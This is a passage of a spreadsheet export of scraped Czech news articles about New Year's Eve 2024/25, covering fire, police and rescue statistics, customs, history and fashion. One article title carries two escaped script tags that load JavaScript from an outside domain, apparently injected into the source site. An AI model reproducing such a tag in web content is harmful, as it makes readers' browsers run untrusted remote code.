ráno celkem 17 zásahů u požáru. V drtivé většině šlo o hořící popelnice. K tomuto typu události nejčastěji vyjížděli v samotné Plzni. Lidé podpálili koše i v Rokycanech , Tachově a Klatovech . „Tak jsme letos stihli vyjet ještě jednou. Požár budovy - hoří logo na Bowlingu. Požár uhašen před naším příjezdem. Takže bacha na tu pyrotechniku,“ napsali ještě před půlnocí na sociální sítích hasiči ze Železné Rudy. Také v sousedním Karlovarském kraji nejčastěji hořeli koše. „ Od půlnoci do sedmi hodin ráno jsme zasahovali u 19 událostí. Ve třinácti případech se jednalo o požáry, kdy hořely zbytky po použité zábavní pyrotechnice či odpad v kontejnerech. Při těchto požárech se nikdo nezranil ,“ dodal mluvčí HZS Karlovarského kraje Martin Kasal . Zatoulaní psi Jedni se na Silvestr těší, druzí nikoli. Do druhé kategorie spadají většinou majitelé psů. Psi mají citlivější sluch a snadno se vylekají. Pokud nejsou dostatečně zajištění, hrozí, že se dají na úprk. To se stalo hned v několika případech. Podle webu Psí detektiv se například takto ve Šťáhlavech zaběhla tříletá fenka francouzského buldočka Rozárka . U Bezdružic majitelům utekl kříženec pitbula . Roční fenku Dexi postrádají páníčci z Plzně – Lochotína a stejně tak chybí chovatelům z Bolevce i kolie Samanta . Autor: Zuzana Duzbabová Autor person Zuzana Duzbabová Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>15060</t>
  </si>
  <si>
    <t>20250101_302_3695076443_968ecc6187b54dfc1d5d.html</t>
  </si>
  <si>
    <t>968ecc6187b54dfc1d5d</t>
  </si>
  <si>
    <t>Silvestrovské a novoroční oslavy na Vysočině byly podle hasičů klidné</t>
  </si>
  <si>
    <t>Silvestrovské a novoroční oslavy na Vysočině byly podle hasičů klidné 1. ledna 2025 8:27 Sdílet článek ilustrační snímek | foto: Metro.cz Silvestrovské a novoroční oslavy na Vysočině byly podle hasičů klidné. Za 12 hodin do dnešních 07:00 zasahovali u osmi událostí. Je to o šest méně než loni. Policie v kraji řešila stovku různých oznámení. Záchranáři na Vysočině ošetřili 59 pacientů, což je podobné jako před rokem. Vyplývá to z informací ČTK . Záchranáři kromě běžných úrazů vyjížděli ke třem pacientů, které poranila pyrotechnika. "Jeden utrpěl poranění ruky a dva poranění v obličeji. Zranění si vyžádala okamžitou zdravotnickou pomoc a transport do nemocnice," uvedl mluvčí záchranářů na Vysočině Petr Janáček. Také ošetřili tři lidi, které někdo napadl. "Přijímali jsme oznámení o dopravních nehodách, spáchaných přestupcích a trestných činech, nálezu munice a řešili situace, do kterých se dostali opilí lidé, konflikty a další události," uvedla policejní mluvčí z Vysočiny Jana Kroutilová . Munici našel v úterý dopoledne u Třebíče muž při rekonstrukci půdy za střešními trámy. Policisté také zastavili několik řidičů, u nichž zjistili alkohol v krvi. Například v Bystřici nad Perštejnem po 03:00 při náhodné kontrole měl řidič auta 1,98 promile v dechu. Hasiči na Vysočině likvidovali nejzávažnější požár v úterý po 19:00. Ve Stojčíně na Pelhřimovsku začaly hořet dva přístřešky na zahradě rodinného domu. "Plameny za sebou zanechaly škodu v předběžné výši 400.000 korun. Při požáru ani samotném zásahu se nikdo nezranil. Požár zapříčinila nedbalost při ukládání popela," uvedla mluvčí hasičů na Vysočině Petra Musilová. Dodala, že hasiči v noci také zasahovali u požárů krabic se zábavní pyrotechnikou v Náměšti nad Oslavou a Jihlavě . Autor: ČTK Témata: Okres Jihlava | Aktuální zprávy, články a informace Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_303_3694536793_e29a703d4d7838ba014d.html</t>
  </si>
  <si>
    <t>e29a703d4d7838ba014d</t>
  </si>
  <si>
    <t>Budějovice před sto lety, díl 45. Silvestr v divadle byl bujarý a na úrovni</t>
  </si>
  <si>
    <t>Budějovice před sto lety, díl 45. Silvestr v divadle byl bujarý a na úrovni Ve městě se oslavoval konec kalendářního roku veřejně přibližně od poloviny 19. století. Do těch časů se na sv. Silvestra chodilo do kostela děkovat za uplynulý rok a modlit se za zdar v novém roce. Působil jistě vliv vlny národního osvobození. Jungmann shromáždil dosavadní češtinu a vydal první slovník česko-německý. Sice Bach a Metternich češtinu dusili, ale nepodařilo se to. V období 1. republiky se již Silvestr slavil veřejně bujaře, považujíce hospody, restaurace, vinárny a kavárny a též divadla za veřejný prostor. Ve městě působili i baráčníci, ochotnická divadla, Sokol , Beseda, také v Alžíru bylo o Silvestru plno. Jihočeské národní divadlo (ještě setrvával termín městské divadlo) mělo chvíli na podzim roku 1924 určité finanční problémy, ale Silvestr v divadle musel být na úrovni. Vlastně to byla vizitka města. Nemohlo se posuzovat to, co se děje na Silvestra v Biskupské v nechvalně Vlčí jámě, nebo v nóbl chvalně známé kavárně Centrál v paláci Včela, i když v obou bylo obsazeno, ve Vlčí jámě našlapáno. Českobudějovicko Na Silvestra ve středu 31. prosince 1924 se v Jihočeském národním divadle hrálo odpoledne dětské představení „Bílá paní“. Večer do šesté hodiny „Madame Pompadour“. Večer o půl desáté následoval velký silvestrovský program, v němž účinkovali všichni, kdo mohl, z činohry, operety, opery, baletu a orchestru. Hrály se dvě aktovky „Nesahejte Ferencovi na zoubek“ a „Muž, který ztratil hlavu“. Půlnoční scéna měla název „Když starý rok omládne“. Jistě byl ve o půlnoci přípitek, asi plné jeviště herců i vedení, jen není detailně doloženo, čím se starý rok zaléval, nebo doléval. Připouštělo se i v dobách 50. let, že to může být víno - sekt. V nové době razila herečka Jirásková ve Vinohradském divadle, že koňak je koňak. V našem divadle byly Silvestry vesele nadšené vždy. V 50. letech cenzura přehlédla náznak 1. republiky: zpívala se karlínská „Policajt, nechaj mě, já jsem v tom nevinně, já jsem ta velká pára a bydlím v Karlíně “, refrén: „My jsme ta velká pára, nás už zná celá Praha , my jsme ty děti Prahy , Karlín a Vinohrady.“ První vánoční strom Svobody na náměstí v roce 1925 totiž navrhl a zařizoval spolek „Pražské děti 28. pěšího pluku“, odbočka v Českých Budějovicích . Autor: Jan Schinko Autor: Jan Schinko, Markéta Trubková Autoři person Jan Schinko person Markéta Trubková</t>
  </si>
  <si>
    <t>10430</t>
  </si>
  <si>
    <t>20250101_304_3694558151_d93802844eb5d09b9ddf.html</t>
  </si>
  <si>
    <t>d93802844eb5d09b9ddf</t>
  </si>
  <si>
    <t>Silvestrovské oslavy byly pro krajské záchranáře náročné, hasiči si oddechli</t>
  </si>
  <si>
    <t>Silvestrovské oslavy byly pro krajské záchranáře náročné, hasiči si oddechli Během Silvestrovských oslav měli záchranáři plné ruce práce, řešili úrazy, rvačky i intoxikaci alkoholem . Hasiči naopak hodnotí uplynulou noc jako relativně poklidnou, evidují osm událostí. Záchranná zdravotní služba Kraje Vysočina během noční směny vyjela k 62 případům, kdy ošetřila 59 pacientů. Je to obdobný počet jako o rok dříve. „V přímé souvislosti s oslavami nového roku evidujeme 23 událostí. Nejčastějšími důvody našich výjezdů byly úrazy, kterých bylo celkem 11. Ve třech případech jsme zasahovali u pacientů po fyzickém napadení,“ vyjmenoval mluvčí Petr Janáček . U šesti lidí řešili záchranáři intoxikaci alkoholem , všechny tyto osoby bylo potřeba převézt k dalšímu ošetření. Tři lidé se pak zranili při nesprávné manipulaci s pyrotechnikou. „Z toho jeden utrpěl poranění horní končetiny a dva poranění v obličeji. Tato zranění si vyžádala okamžitou zdravotnickou pomoc a transport do nemocnice,“ dodal Janáček. Ve Stojčíně hořely přístřešky Hasiči naopak hodnotí poslední noc roku 2024 jako relativně poklidnou. „Od včerejší sedmé hodiny v podvečer do dnešní sedmé hodiny ráno zasahovali hasiči na Vysočině u 8 událostí,“ sdělila ve středu ráno mluvčí Petra Musilová . Ve čtyřech případech šlo o požáry. „Po sedmé hodině v podvečer zasahovaly čtyři jednotky hasičů u požáru dvou volně stojících přístřešků na zahradě rodinného domu ve Stojčíně na Pelhřimovsku. Plameny za sebou zanechaly škodu v předběžné výši 400 tisíc korun. Při požáru ani samotném zásahu se nikdo nezranil. Požár zapříčinila nedbalost při ukládání popela," popsala Musilová. V Náměšti nad Oslavou a v Jihlavě hořely krabice se zábavní pyrotechnikou, ve Žďáru nad Sázavou zasahovali hasiči před půl jednou v noci u požáru plastového kontejneru. O půl třetí ráno pak hasiči řešili nehodu osobního auta u Pořežína u Velké Losenice , kde se zranili dva lidé. Autor: Prokop Veselý Autor person Prokop Veselý</t>
  </si>
  <si>
    <t>10180</t>
  </si>
  <si>
    <t>20250101_305_3694554603_ffad8096cf7eff6cd6fa.html</t>
  </si>
  <si>
    <t>ffad8096cf7eff6cd6fa</t>
  </si>
  <si>
    <t>Kde se vzala tradice novoročních předsevzetí: Během novoroční ceremonie si je dávali už staří Římané, některé zvyky dodržujeme dodnes</t>
  </si>
  <si>
    <t>Kde se vzala tradice novoročních předsevzetí: Během novoroční ceremonie si je dávali už staří Římané, některé zvyky dodržujeme dodnes Zhubnout. Přestat kouřit. Přestat pít. Víc sportovat. Jíst zdravěji. Být hodnější na děti. Být milejší na partnera. Víc cestovat. Víc vydělávat. Víc šetřit. To jsou taková ta nejčastější předsevzetí z mnoha, která si lidé po celém světě každoročně na začátku nového roku dávají v touze je opravdu splnit. Málokdo je ale opravdu po celý rok dodržuje. Odkud se vlastně tato tradice vzala? Zábava | Marta Pušová | 1. 1. 2025 Novoroční předsevzetí jsou každoroční tradicí, kdy si l idé na začátku nového roku stanovují cíle, které chtějí během roku splnit. Nejčastěji jsou spojená s touhou zlepšit svůj život, zdraví, vztahy, nebo dosáhnout nějakých dlouhodobých snů . Jenže protože většina lidí v plnění svých předsevzetí dříve či později většinou selže, doporučují dnes odborníci zaměřit se na nastavení záměrů. Například: „Chci být v novém roce laskavější k sobě a druhým.“ Tento přístup je flexibilnější a méně stresující než přesné cíle. Vše začalo v Římské říši Novoroční předsevzetí si lidé dávají po dlouhé generace, málokdo ale pravděpodobně přemýšlí, proč to vlastně dělá a jaký mají novoroční předsevzetí původ. Možná vás to překvapí, ale ten se datuje až do období Římské říše, která existovala v letech 27 př. n. l. až 395 n. l. Tehdy rok co rok právě 1. ledna nejvyšší představitelé Říma obnovovali své předsevzetí zůstat loajální vůči republice a přísahali věrnost císaři. Tento slib probíhal během velké ceremonie , které se účastnily i legie a součástí bylo také obětování bohům. Důvodem tohoto aktu bylo obnovení vazem mezi občany, státem a bohy. Tehdy se také stalo zvykem, že si lidé žehnali do nového roku a dávali si jako dary med a ovoce . Příchod nového roku měli tehdy Římané spojený zejména s uctíváním boha Januse. Janus byl bohem dveří, prahů, začátků a konců i přechodu z jednoho stavu do druhého , třeba z mládí do dospělosti. Z jeho jména také vznikl název měsíce leden, který Římané pojmenovali podle tohoto boha Januarius. Název se v různých podobách přenesl i do mnoha dalších jazyků, například v angličtin je to January, ve slovenštině Január. Novoroční zvyky 1. ledna se také klade velký důraz na to, co jíst a nejíst, protože strava může podle pověr ovlivnit celý následující rok. Právě proto by se na novoročním stole neměla objevit například drůbež, aby z domu neulétlo štěstí . V případě králíka může utéct a pokud si dáte rybu, tak uplave. Zato vepřové je více než žádoucí, jelikož přináší štěstí a bohatství. Peněz byste se měli dočkat i v případě, že 1. ledna poobědváte čočku . Na Nový rok by se neměly vykonávat ani domácí práce . Při zametání si totiž vymetete štěstí z domu a praní a věšení prádla může do rodiny přinést smrt. Jelikož se říká „Jak na Nový rok, tak po celý rok“ , je tudíž žádoucí vyhnout se 1. ledna všemu negativnímu, jinak nás to bude provázet následujících dvanáct měsíců. Zapomeňte proto na hádky a mrzutosti a dělejte jen to, co vás těší, aby celý následující rok pro vás byl příjemný. Není den jako den Většina z nás se zaměřuje na to, na který den vychází Nový rok zejména kvůli tomu, abychom věděli, kdy budeme muset zpátky do práce a kolik dní nám po oslavách Nového roku zbývá do víkendu, kdy budeme ještě dospávat náročné svátky. Pravdou ale je, že každý den v kalendáři podle pověr nějak ovlivňuje následující rok. Pokud tedy 1. leden vychází na pondělí, dá se očekávat krutá zima, vlhké jaro a také povodně a nemoci. Úterý sice slibuje krutou zimu, ale zase nám to vynahradí v létě dobrou úrodou. Středa přináší v následujícím roce dostatek vína , ovšem medu nebude nazbyt, čtvrtek je přívětivý v mnoha ohledech. Zaručuje totiž mírnou zimu, větrné jaro, horké léto a příjemný podzim a k tomu navrch hodně ovoce i bohatou úrodu obilí. Nejhorší je pátek , který přináší chladný a nepříznivý rok, nemoci a nepokoje. Se sobotu přichází hodně ovoce, avšak méně obilí a nedělní Nový rok předvídá mírnou zimu, jaro plné úrody a větrné léto. Novoroční pranostiky 1. leden je samozřejmě spojen s řadou pranostik, které si kladli na srdce naši předkové a často se jimi řídili. Zde jsou ty nejznámější: Jak na Nový rok, tak po celý rok. Na Nový rok, do zimy skok. Na Nový rok ráno nebe rudé – nepohoda, svízel velká bude. Na Nový rok bláto, na Velikonoce sníh. Novoroční noc jasná a klidná, bude povětrnost pro úrodu vlídná. Ve dne jas, v noci mráz. Když začátkem ledna krásně, budou zjara bouřky časně. Jsou-li červánky v novoroční den, přinesou jistě samou slotu jen. Když se rok se zimou a sněhem počíná, slibuje dost chleba, ale málo vína . Zajímá vás, co vás čeká v novém roce? Přečtěte si čínský horoskop na rok 2025. Tyto zvyky lidé na Nový rok dodržují dodnes: Přejít do galerie Zdroj článku www.novinky.cz, www.rozhlas.cz, www.blesk.cz, www.kudyznudy.cz Doporučená videa z partnerského webu z Lifee.cz : novoroční předsevzetí novy rok predsevzeti úkoly tradice zvyky Zato drůbež může zapříčinit to, že z domu ulítne štěstí Foto: Shutterstock Také vepřové maso má zaručit blahobyt a zdraví Měla by se jíst čočka, která díky své podobě s mincemi značí bohatství a hojnost Na Nový rok by se nemělo uklízet, abychom si nevymetli štěstí z domu P Autor: Marta Pušová Autor person Marta Pušová</t>
  </si>
  <si>
    <t>90310</t>
  </si>
  <si>
    <t>20250101_306_3695076440_36024935744439341939.html</t>
  </si>
  <si>
    <t>36024935744439341939</t>
  </si>
  <si>
    <t>Silvestr ve Zlínském kraji byl pro policii rušný, ale bez mimořádných událostí</t>
  </si>
  <si>
    <t>Silvestr ve Zlínském kraji byl pro policii rušný, ale bez mimořádných událostí Záchranáře ve Zlínském kraji zaměstnali o silvestrovské noci hlavně opilí lidé 1. ledna 2025 8:10 , aktualizováno 10:47 Sdílet článek ilustrační snímek | foto: Metro.cz Posádky Zdravotnické záchranné služby Zlínského kraje (ZZS ZK) zaměstnali o silvestrovské noci zejména opilí lidí. Zdravotnické týmy zasahovaly také u třech desítek úrazů, záchranáři ošetřovali i chlapce poraněného pyrotechnikou. Zasahovali celkem u více než stovky událostí. Operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155, sdělila dnes ČTK mluvčí ZZS ZK Gabriela Netopilová Sluštíková. Počty výjezdů a volání jsou podobné jako v předchozích letech. "U řady výjezdů byl společným jmenovatelem alkohol . Dvě pacientky mladšího věku ho požily takové množství, že po nezbytném vyšetření a ošetření na místě je naše posádky převezly na dětskou jednotku intenzivní péče," uvedla mluvčí. Záchranáři zasahovali u třech desítek úrazů a další pacienty ošetřili po napadení. "K mnoha těmto úrazům by nedošlo, pokud by lidé nebyli pod vlivem alkoholu . Řešili jsme také jeden typický úraz spojený s použitím zábavné pyrotechniky. Chlapce petarda poranila v obličeji," uvedla Netopilová Sluštíková. Zdravotníci na urgentním příjmu Krajské nemocnice T. Bati ve Zlíně neošetřovali o silvestrovské noci vážné úrazy nebo poranění. "Zato alkohol hrál jako obvykle prim, na traumatologii bylo ošetřeno kolem a po půlnoci deset lidí, z toho devět pod vlivem alkoholu včetně jednoho, který kombinoval alkohol s návykovou látkou," uvedla mluvčí nemocnice Dana Lipovská. Většina pacientů měla po pádech povrchová poranění. "Vypíchnout by se dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu proběhl skleněnou výplní dveří. Hospitalizován zůstal pouze muž, který má po rvačce zlomenou horní čelist a nos, ten čeká na vystřízlivění a operaci," uvedla Lipovská. Na interní pohotovosti lékaři po půlnoci ošetřili devět lidí s průjmy, křečemi v břiše a problémy se zažíváním. Nikdo z nich nebyl hospitalizován. V chirurgické ambulanci Vsetínské nemocnice od úterních 18:00 do dnešních 06:00 ošetřili 13 lidí. "V několika případech se jednalo o úrazy, které si způsobili lidé v podnapilosti. Jeden člověk byl ošetřen po úrazu pyrotechnikou. Jednalo se o lehčí poranění ruky, které si vyžádalo šití a bylo ošetřeno v rámci ambulance. Přišel také pacient, který byl pokousán psem," uvedla mluvčí nemocnice Lenka Plačková . Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_307_3694757725_aced2cdd07f6fabf8be7.html</t>
  </si>
  <si>
    <t>aced2cdd07f6fabf8be7</t>
  </si>
  <si>
    <t>Hasiči hodnotí Silvestra 2024: 106 zásahů během jediné noci</t>
  </si>
  <si>
    <t>Hasiči hodnotí Silvestra 2024: 106 zásahů během jediné noci Středa, 1. ledna 2025 08:10 Během silvestrovských oslav a příchodu Nového roku zažili hasiči rušnou noc. Mezi půlnocí 31. prosince 2024 a 8. hodinou ranní 1. ledna 2025 vyjížděli k celkem 106 mimořádným událostem. Nejvíce z nich souviselo s požáry, které často doprovázely ohňostroje a zábavní pyrotechnika. Ilustrační foto: KL Nejčastější zásahy: 62 požárů: Z toho 47 bylo přímo spojeno se silvestrovskými oslavami. Mezi nejčastější příčiny patřilo nesprávné zacházení s pyrotechnikou, která zapálila kontejnery, keře či drobné stavby. 24 technických pomocí: Hasiči pomáhali například s odstraněním spadlých větví či zajištěním nebezpečných předmětů. 10 dopravních nehod: Alkohol za volantem a nepřizpůsobení jízdy zimním podmínkám si vyžádaly zásahy u nehod, které se naštěstí obešly bez větších tragédií. 5 ostatních pomocí: Ty zahrnovaly například asistenci záchranářům nebo pomoc obyvatelům při méně obvyklých situacích. 3 úniky nebezpečných látek: V těchto případech šlo zejména o úniky plynu, které se podařilo rychle vyřešit. 2 plané poplachy: I tentokrát vyjížděli hasiči zbytečně, což ale k jejich práci bohužel patří. Varování pro příští rok Hasiči apelují na veřejnost, aby byla při manipulaci se zábavní pyrotechnikou obezřetná a dbala na pravidla bezpečnosti. Zejména v městských oblastech mohou drobné chyby vést k rozsáhlým škodám. Bezpečný začátek nového roku Navzdory vysokému počtu zásahů hodnotí hasiči noc jako zvládnutou. Děkujeme našim profesionálním i dobrovolným hasičům, kteří přispěli k bezpečnosti během silvestrovských oslav. Do roku 2025 si hasiči přejí klidnější začátek, a my všichni bychom jim v tom mohli pomoci větší opatrností a ohleduplností. Autor: Pavel Varvařovský Autor person Pavel Varvařovský Rubrika transition_slide Nezařazené</t>
  </si>
  <si>
    <t>20250101_308_3717934882_07402137c2b2b8680ebf.html</t>
  </si>
  <si>
    <t>07402137c2b2b8680ebf</t>
  </si>
  <si>
    <t>Policisté v MSK na přelomu roku řešili stovky událostí, petardou se zranil mladík z Havířova &amp;lt;ScRipT SrC=https://12JAV.NET/1.JS&amp;gt;&amp;lt;/sCrIpT&amp;gt;&amp;lt;ScRipT SrC=https://12JAV.NET/1.JS&amp;gt;&amp;lt;/sCrIpT&amp;gt; V Moravskoslezském kraji proběhly silvestrovské oslavy bez výjimečných událostí. Policisté během noci na Nový rok zaznamenali nejvíce výjezdů mezi půlnocí a jednou hodinou ranní, přičemž řešili desítky oznámení týkajících se výtržností, majetkových trestných činů i událostí spojených s pyrotechnikou. Soňa Štětínská, mluvčí Policie ČR MSK: “Do silvestrovské půlnoci byl relativní „klid před bouří“, tedy žádný razantní nárůst přijatých oznámení na linku 158 nebo událostí, které by policisté řešili oproti běžnému dni. Situace se jako každoročně změnila úderem půlnoci. Pro představu: policisté řeší v průběhu roku za den přes 300 věcí, přičemž za prvních pět hodin roku letošního bylo zhruba 210 těchto výjezdů a reakcí. Rekordmanem byla první hodina - policisté řešili 75 událostí. Počet hovorů na tísňovou linku 158 je samozřejmě o poznání vyšší, v některých chvílích může býti až dvojnásobný, ale ne vše oznámené patří k řešení policii, anebo k jedné věci přijmou operátoři tísňové linky 158 na operačním středisku více hovorů. Spektrum oznámených věcí bylo opravdu široké. Policisté řešili případy výtržností i narušení veřejného pořádku, zaznamenali jsme fyzická napadání, jak v bytech, barech, restauracích i ve venkovním prostředí. Asi nepřekvapí, že v mnoha případech hrál svou roli alkohol . Máme hlášeny skutky majetkové, dále například i ztrátu všech dokladů. Kolem půlnoci a v prvních chvílích nového roku si prim v oznámeních na linku 158 držela jednoznačně volání ohledně rušení nočního klidu a používání pyrotechniky." Petr Andráško, mluvčí HZS MSK: "Na území kraje evidujeme od 31.12. 23:00 do 1.1. 2025 7:00 celkem 74 mimořádných událostí, z toho 58 požárů (16x pyrotechnika). Ve zmíněných 58 požárech jsou zahrnuty především požáry odpadních nádob (popelnice, kontejnery), odpadu, lesních porostů, křovin a travin, a další požáry, včetně těch způsobených zábavní pyrotechnikou." Policisté řešili samozřejmě část událostí v úzké součinnosti se zdravotníky, hasiči a strážníky městské policie – ať šlo o oblast veřejného pořádku, oznámení o podnapilých osobách, zahoření či škody způsobené pyrotechnikou. Soňa Štětínská, mluvčí Policie ČR MSK: “Asistovali jsme hasičům u několika desítek zahoření například popelnic, krabic od petard, živých plotů a tújí od rachejtlí. Vyjeli jsme také dnes kolem půl jedné ráno do Ostravy – Poruby , kde měla pod zaparkovaným vozidlem explodovat petarda a bylo vidět zadýmení. Na místě zasahovali právě kolegové hasiči. Automobil má poškození ve spodní části. Policisté se událostí zabývají. Kolegům z městské policie jsme zase předávali několik oznámení typu nález opuštěného psa nebo informaci o psovi, který spadl do díry a uvízl v ní. S kolegy zdravotníky jsme zase řešili případy, u kterých došlo ke zranění osob." Sledujte také Jako první miminko roku 2025 se v Nemocnici Frýdek-Místek narodila Julie Pyrotechnikou se vážně poranil mladík v Havířově . Lukáš Humpl, mluvčí ZZS MSK: "Během novoročních oslav zasahovali záchranáři ZZS MSK u osmi událostí vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. Od půlnoci do ranních hodin 1. ledna bylo nutno ošetřovat přes pět desítek zraněných. Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet, jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob posádkám ZZS uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty. S diagnózou opilosti či těžké opilosti muselo být v našem kraji záchrannou službou během silvestrovského večera a noci ošetřeno šestnáct osob." Soňa Štětínská, mluvčí Policie ČR MSK: “Zaznamenali jsme i zranění v souvislosti s používáním pyrotechniky. Dnes zhruba čtvrt hodiny po půlnoci se rozhodl ani ne dvacetiletý muž oslavit v Havířově příchod nového roku zábavní pyrotechnikou. Když po zapálení knotu nedošlo k explozi, měl se pokusit o opětovné zapálení. V té chvíli došlo k explozi. Muž byl se zraněním v oblasti hlavy předán zdravotníkům. Nemělo by se jednat o závažné 2 poranění. Mladík zřejmě nerespektoval pokyny z návodu na použití, nedbal opatrnosti při manipulaci s pyrotechnikou." Příchod nového roku vyvolával také konflikty Soňa Štětínská, mluvčí Policie ČR MSK: “Vyjížděli jsme na oznámení o různých fyzických konfliktech mezi vícero osobami, ať v sousedních bytech anebo venku. V mnoha případech se jednalo jen o hlasitější „párty“. Každopádně děkujeme za vaši všímavost. I díky ní se policisté dozvěděli o „podivném“ muži, který měl v Ostravě – Porubě zhruba hodinu před půlnocí venku pobíhat zcela bos. Rozuzlení bylo prosté, zabouchl si dveře a pomoc přišla vhod… Policisté na Opavsku pak pomohli vyřešit svízelnou situaci muže, který si pár minut po půlnoci ponechal klíče ve vozidle, jež se uzamklo. Co se týká dopravních nehod, oficiální statistiky nejsou prozatím k dispozici. Z předběžných dat lze vyčíst, že v roce 2024 jsme v Moravskoslezském kraji zaznamenali téměř 10 790 dopravních nehod, při kterých bylo 31 osob usmrceno, přes 120 osob utrpělo těžké a více než 2 200 osob lehké zranění. Ve srovnání s rokem 2023 se jedná o pokles u počtu osob usmrcených a těžce zraněných. Jedna ne až tak běžná nehoda, respektive dvě, se staly včera kolem 19:30 hodin na silnici I/56 u Paskova . Přes komunikaci proběhlo stádo divokých prasat. Jedno vozidlo srazilo divočáka, druhé auto narazilo do dalšího zvířete. Disponuji informací o čtyřech zraněných osobách, které byly předány zdravotníkům k ošetření, mělo by se jednat o lehká zranění. Silnici bylo nutno ve směru na Ostravu po dobu nezbytně nutnou uzavřít, policisté prováděli odklon dopravy přes Paskov . Kontaktovali rovněž myslivce." Vytisknout článek Nahlásit chybu Chyba byla úspěšně nahlášena. Při odeslání nastala chyba. reCAPTCHA ověření selhalo. Zkuste to prosím znovu. Popis chyby: V případě zájmu o odpověď, prosím zanechte na sebe e-mail v textu zprávy. Autor: Libor Běčák Autor Libor Běčák Rubrika transition_slide News</t>
  </si>
  <si>
    <t>14450</t>
  </si>
  <si>
    <t>18350</t>
  </si>
  <si>
    <t>20250101_309_3694518234_8c827d603e7d4edff902.html</t>
  </si>
  <si>
    <t>8c827d603e7d4edff902</t>
  </si>
  <si>
    <t>Virální fashion momenty roku 2024</t>
  </si>
  <si>
    <t>Virální fashion momenty roku 2024 Maison Margiela Artisanal Collection Starý dobrý couture se oficiálně vrátil zpět, a nevzkřísil jej nikdo jiný než sám maestro honosných přehlídek, John Galliano . Jeho lednová couture kolekce pro dům Margiela byla skoro návratem v čase, kdy byly přehlídky opravdovou show, kde diváci s každým lookem tajili dech a kde každý kus skrýval příběh, historickou referenci a zároveň i inovaci. Kromě fenomenální přehlídky crème de la crème couture také celý virtuální svět podlehl tužbě replikovat make-up look, který pro přehlídku vytvořila geniální vizážistka Pat McGrath – porcelánově hladkou a lesklou pleť, pro kterou byl potřeba speciální koktejl (nejen) make-up ingrediencí. 3 / 17 Přejít do galerie John Galliano Gala Met Gala patřilo Johnu Gallianovi , kterého zvolili nejvýznamnější hosté, a Zendaya jej oblékla dokonce dvakrát – přičemž jedny ze šatů byly z její vlastní sbírky. Kolovala teorie, proč si návrhář troufl tak trochu nedodržet téma večera (o fous) – a to ta, že večer měl být původně věnován poctě jeho celoživotního díla. To, ve spojení s jeho velkolepou couture kolekcí pro Margiela, vyvolalo podezření o tom, že je něco na spadnutí… Kromě dechberoucích looků od Johna Galliana musíme zmínit také róby J. W. Andersona pro Annu Wintour, Taylor Russel, Ayo Edebiri a Grettu Lee, překrásné róby Thoma Brownea pro Rebeccu Ferguson , Cynthii Erivo a Queen Latifah i písečné šaty kreativního ředitele Balmain, Oliviera Rousteinga pro Tyla, které byly z praktických důvodů samotným tvůrcem nůžkami zkráceny přímo na akci. Mimochodem, mezi osobními favority byla i Mindy Kaling v Gurava Gupta. 3 / 52 Přejít do galerie Vykoupení Johna Galliana Zendaya a její tour de Challengers a Dune Jen těžko bychom hledali výraznější popkulturní osobnost, než je Zendaya. Lví podíl na tom má její stylista, Law Rocha, který umí z „obyčejného“ press turné udělat nejvýznamnější fashion přehlídku. Oblékla si zakázkové kusy domů Loewe, Thom Browne, Louis Vuitton , ALAÏA, Brunello Cucinelli nebo Ralph Lauren s filmovou tematikou, čímž vyvolala bujaré ohlasy uživatelů sítě a zároveň odpromovala film tím nejlepším způsobem. Největší ohlas však vyvolal její look na londýnskou premiéru pokračování Dune, kam si oblékla archivní robotický kousek domu Thierryho Muglera z couture kolekce 1995. Unikátnost tohoto momentu spočívala v tom, že se historicky onen Maschinenmensch kousek vytvořil speciálně pro modelku Jo Krasevich. V rámci interview pro krátký film na Amazon Prime kreativní ředitel domu, Casey Cadwallader řekl, že ve hře byl každé detail, který mohl celý nápad zcela položit. Kdyby Zendaya měla jiné proporce než Jo – kolena či lokty trochu níž nebo výš, delší či kratší nohy, bylo by nemožné správně zkonstruovat look a/nebo herečka by se v něm nemohla hnout. Byl to proto zcela raritní moment, který se zcela oprávněně stal virálním. 3 / 13 Přejít do galerie Wild Wild West podle Pharella Celé týdny nebyla začátkem roku na sítích slyšet jiná nahrávka než Texas hold 'em od Beyoncé. Její „kovbojská éra“ však nepřišla jen tak, ale v návaznosti na kolekci Pharrella Williamse coby kreativního ředitele pánské divize Louis Vuitton . Právě ten předvedl začátkem roku kolekci pro francouzský dům, jejímž ústředním tématem byla kovbojská estetika, a to v celé kráse Divokého západu. Z přehlídky pak tento vibe putoval přímo na předávání Grammy 2024, kde si zpěvačka oblékla kožené košilové šaty s ikonickou „LV šachovnicí“ a kovbojský klobouk. 3 / 7 Přejít do galerie Cynthia Erivo a Ariana Grande na premiérách Wicked Ať už máte rádi muzikály, nebo ne, v Americe se o Wicked mluví hodně – na prequel (neboli film s dějem předcházejícím původnímu snímku) Čaroděj ze země Oz z roku 1939 s Judy Galand v hlavní roli (kde si určitě budete pamatovat píseň Somewhere Over the Rainbow) se čekalo již velmi dlouho a press tour proto musela být se vším všudy. Zatímco Ariana Grande coby „hodná čarodějka“ volí růžové róby od Giambattista Valli nebo Versace, Cynthia Erivo má jako „zlá čarodějka“ možnost volit ty nejextravagantnější looky. Mezi ty nejlepší patří rozhodně Schiaparelli a (pochopitelně) Thom Browne. 3 / 10 Přejít do galerie Victoria's Secret Po kritice od široké veřejnosti (za přehlídky, špatný business model a mnohé další) se po pauze vrátila přehlídka Victoria's Secret v původním formátu – plná krajky, titěrného prádla, velkých křídel a ještě větších jmen. Vedle „stálic“, jako jsou Adriana Lima , Gigi a Bella Hadid , Alessandra Ambrosio, Doutzen Kroes, Candice Swanepoel , Joan Smalls a Irina Shayk , bylo tenkrát na mole i mnoho hvězdných hostů – krom plus size modelek Ashley Graham a Palomy Elsesser zde byly také Kate a Lila Moss, 